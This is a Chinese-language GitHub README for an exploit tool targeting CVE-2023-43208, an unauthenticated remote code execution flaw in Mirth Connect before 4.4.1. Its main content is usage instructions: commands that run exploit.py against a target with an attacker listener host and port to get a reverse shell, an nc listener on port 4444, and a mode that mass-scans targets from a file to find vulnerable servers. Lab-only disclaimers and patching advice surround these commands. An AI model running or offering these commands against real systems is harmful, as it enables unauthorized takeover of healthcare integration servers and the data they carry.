MKIRAHMET/PoC-2023-43208
GitHub: MKIRAHMET/PoC-2023-43208
针对 CVE-2023-43208 的 PoC 利用工具,可对 Mirth Connect 4.4.1 之前版本实施未经认证的远程代码执行攻击。
Stars: 3 | Forks: 0
# CVE-2023-43208-EXPLOIT
## Mirth Connect 远程代码执行 (RCE) 漏洞利用




针对 CVE-2023-43208 的概念验证漏洞利用程序,这是 Mirth Connect 4.4.1 之前版本中的一个远程代码执行漏洞。
## 🚨 重要法律免责声明
**本工具仅用于:**
- 🧪 **教育目的**
- 🔬 **实验室环境下的授权安全测试**
- 📚 **网络安全研究与学习**
**切勿用于:**
- ❌ 攻击您不拥有的系统
- ❌ 未获得明确书面许可的情况
- ❌ 生产环境
- ❌ 非法或恶意目的
**您有责任遵守所有适用的法律和法规。滥用此工具可能会导致刑事指控。**
## 📋 描述
此漏洞利用程序针对 Mirth Connect `/api/users` 端点中的 XML 反序列化漏洞,允许在受影响版本(< 4.4.1)上执行未经身份验证的远程代码。
**这是一个严重 (CRITICAL) 漏洞,应仅在您自己系统的独立实验室环境中进行测试。**
## 🔧 需求
- Python 3.7 或更高版本
- `requirements.txt` 中列出的所需依赖包
- **一个实验室环境**,配备含有漏洞的 Mirth Connect 实例
## 🚀 安装
# 克隆仓库
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT
# 安装依赖
pip install -r requirements.txt
💻 用法(仅供实验室使用)
交互模式(推荐实验室使用)
bash
python exploit.py
命令行模式
bash
# 单一目标利用(仅供实验室使用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# 从文件扫描多个目标(仅供实验室使用)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# 非交互模式(仅供实验室使用)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
选项
text
-u, --url 要利用的目标 URL(仅供实验室使用)
-lh, --lhost 监听主机(您的 IP)
-lp, --lport 监听端口
-f, --file 包含要扫描的目标 URL 的文件
-o, --output 用于保存扫描结果的输出文件
-t, --threads 扫描使用的线程数(默认:50)
--no-interactive 以非交互模式运行
🎯 实验室环境示例
搭建您的实验室:
在隔离的虚拟机中安装含有漏洞的 Mirth Connect 版本(< 4.4.1)
使用受控网络(例如 VirtualBox/VMware 中的 NAT/Host-only)
切勿暴露于互联网
启动您的监听器:
ncat -lnvp 4444
# 或者
nc -lnvp 4444
在您的实验室中运行漏洞利用程序:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
🧪 测试环境要求
隔离网络/VLAN
仅限虚拟机
无生产数据
防火墙规则阻止外部访问
记录适当的授权
📝 技术细节
漏洞类型:XML 反序列化 RCE
受影响版本:Mirth Connect < 4.4.1
修复版本:4.4.1 及以上
CVSS 评分:9.8(严重)
攻击向量:网络
身份验证:无需认证
该漏洞利用程序通过 /api/users 端点,利用 Commons Collections gadgets 实现 RCE。
🛡️ 防护措施
如果您正在运行 Mirth Connect:
✅ 更新至 4.4.1 或更高版本
✅ 限制对管理界面的网络访问
✅ 实施适当的身份验证
✅ 监控可疑的 XML 载荷
👥 致谢
原作者:K3ysTr0K3R & Chocapikk
修改者:M0h4
CVE:CVE-2023-43208
⚠️ 最后警告
╔══════════════════════════════════════════════════════════════╗
║ 本工具仅供实验室使用 ║
║ 未经授权的使用是非法且不道德的 ║
║ 您需承担所有风险和责任 ║
║ 作者不对滥用行为承担任何责任 ║
╚══════════════════════════════════════════════════════════════╝
标签:CISA项目, CVE-2023-43208, Mirth Connect, Mirth Connect < 4.4.1, PoC, Python, Python脚本, RCE, XML反序列化, 医疗安全, 攻击脚本, 无后门, 暴力破解, 未授权访问, 概念验证, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞